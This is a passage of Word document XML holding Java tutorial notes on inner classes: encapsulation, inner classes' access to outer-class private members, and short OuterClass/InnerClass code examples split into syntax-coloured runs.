          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ner classes allow for better </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by grouping classes together that are closely related. This makes the code easier to maintain, understand, and modify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E612F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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helps in keeping the inner class hidden from other parts of the program where it is not needed, thereby improving the structure of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04830286" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00C9136F" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A60721" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C3DE1" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Outer"</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E9FC1" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45937FBC" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46983A38" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> printName</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE57E6" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Accessing private member of outer class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307EFF6D" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319CF84" w14:textId="77777777" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D5513" w14:textId="60A61FC1" w:rsidR="00115EE5" w:rsidRPr="00115EE5" w:rsidRDefault="00115E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5193325"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82A43D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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2. Access to Outer Class Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3A03D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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ner classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have direct access to the outer class’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private fields and methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is useful when the inner class needs to manipulate or interact with the outer class's state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1487032E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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is beneficial when there is a tight coupling between the inner and outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A91A5FA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00C9136F" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23794C" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF13F7C" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> message </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello from outer class!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D6106" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161FE904" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
